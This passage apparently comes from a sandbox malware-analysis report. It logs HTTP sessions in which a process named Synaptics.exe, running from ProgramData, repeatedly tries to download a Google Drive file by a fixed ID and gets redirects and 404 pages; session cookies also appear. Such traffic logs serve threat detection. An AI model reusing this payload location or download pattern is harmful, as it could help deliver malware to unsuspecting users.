                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-gZXcQIPd7C_z1zFawLmRBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Set-Cookie: NID=520=SrDjQsTi5aM3Y2MbUchHVvWZIqrlHKgIL685g4nhgEV4rJx4kjebBUMbDUxhRXpVu4_DMcHX3f-COVQnUJMe8p-5cN8H9skaZZTE_clRgqz-O9PdMlTZlbsmQzNT6xZryPDm-t1KC-oftlTjqjODq9KNhxmczYU_-fWhdxvUdtzEfL5peodoJq8; expires=Tue, 01-Jul-2025 10:48:58 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:48:58 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 7a 77 66 51 45 50 70 41 4c 33 53 73 42 69 39 43 4a 59 5a 61 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="azwfQEPpAL3SsBi9CJYZaw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                                            2024-12-30 10:48:58 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            9192.168.2.849730142.250.185.784438060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:48:57 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-12-30 10:48:58 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:58 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-fFDmXlrjWdH3txD748gpUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            10192.168.2.849733142.250.185.1614438060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:48:58 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            2024-12-30 10:48:58 UTC1601INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC4pcGMXXu-uzf0A7AG1l2TkE6Jd3IlVD0YXR4t-ucZ5SqrEEZ1k-cPgFRjjsTceQV6bGr6iFyA
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:58 GMT
                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-GP7RymNJYgkViWAzmghQ7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Set-Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM; expires=Tue, 01-Jul-2025 10:48:58 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:48:58 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 72 37 6d 75 71 32 77 5a 54 71 6a 39 34 7a 54 42 39 6a 48 7a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Kr7muq2wZTqj94zTB9jHzg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                                            2024-12-30 10:48:58 UTC51INData Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            11192.168.2.849734142.250.185.784438060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:48:58 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-12-30 10:48:59 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:59 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-0aP1peOZ4f9vToTnNyYnoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            12192.168.2.849735142.250.185.784438060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:48:58 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-12-30 10:48:59 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:59 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-r_YljptOBgLR2haYoxAMkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            13192.168.2.849736142.250.185.1614438060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:48:58 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=VC9Az_mxJ6FjsLomJdQOpKgQ4a1FhUiWGrzaZIMrw8k6urzaBLn7gtF1ACWlSJ8unr8PDR5SNcOe093vYylGPwpZvusWE7hocDA-7-p5uk-Flsh3bUQs_rlUzgEjafxKOB_oLSUQknDeVd8xqaAFKac_Rpc5-jpZSSFqffNXjgy_zxzFCv8KJUM
                                                                                                                                                                            2024-12-30 10:48:59 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7xTkcSGTIYxMIdbHF8zE-CfhqmKlvyH9oRJfLkvNZGodKGHaSBO6-4rgr_YuY42A96V3g3WmQ
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:48:59 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-xI9fW_5nQzH5VtB4tO5KvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:48:59 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:48:59 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 4f 73 6f 69 70 76 68 2d 47 75 5f 7a 6e 74 62 33 61 33 76 4c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="2Osoipvh-Gu_zntb3a3vLA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:48:59 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            14192.168.2.849738142.250.185.1614438060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:48:59 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=VC9Az_mxJ6FjsLomJdQOpKgQ4a1FhUiWGrzaZIMrw8k6urzaBLn7gtF1ACWlSJ8unr8PDR5SNcOe093vYylGPwpZvusWE7hocDA-7-p5uk-Flsh3bUQs_rlUzgEjafxKOB_oLSUQknDeVd8xqaAFKac_Rpc5-jpZSSFqffNXjgy_zxzFCv8KJUM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            15192.168.2.849743142.250.185.1614438060C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:07 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:07 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC71VaAJcBcvCKWyCa9BMGU2nZlyp8GtXolj-lQsOz5bNUKYd1kWdw9eAhHRrDtBGwrT
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:07 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-8nVV3S4L_3FyQxwlvWNlJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:07 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:07 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 64 70 74 6c 74 76 73 4f 67 66 35 47 7a 42 72 4a 57 4b 34 78 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="adptltvsOgf5GzBrJWK4xA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:07 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            16192.168.2.849751142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:14 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
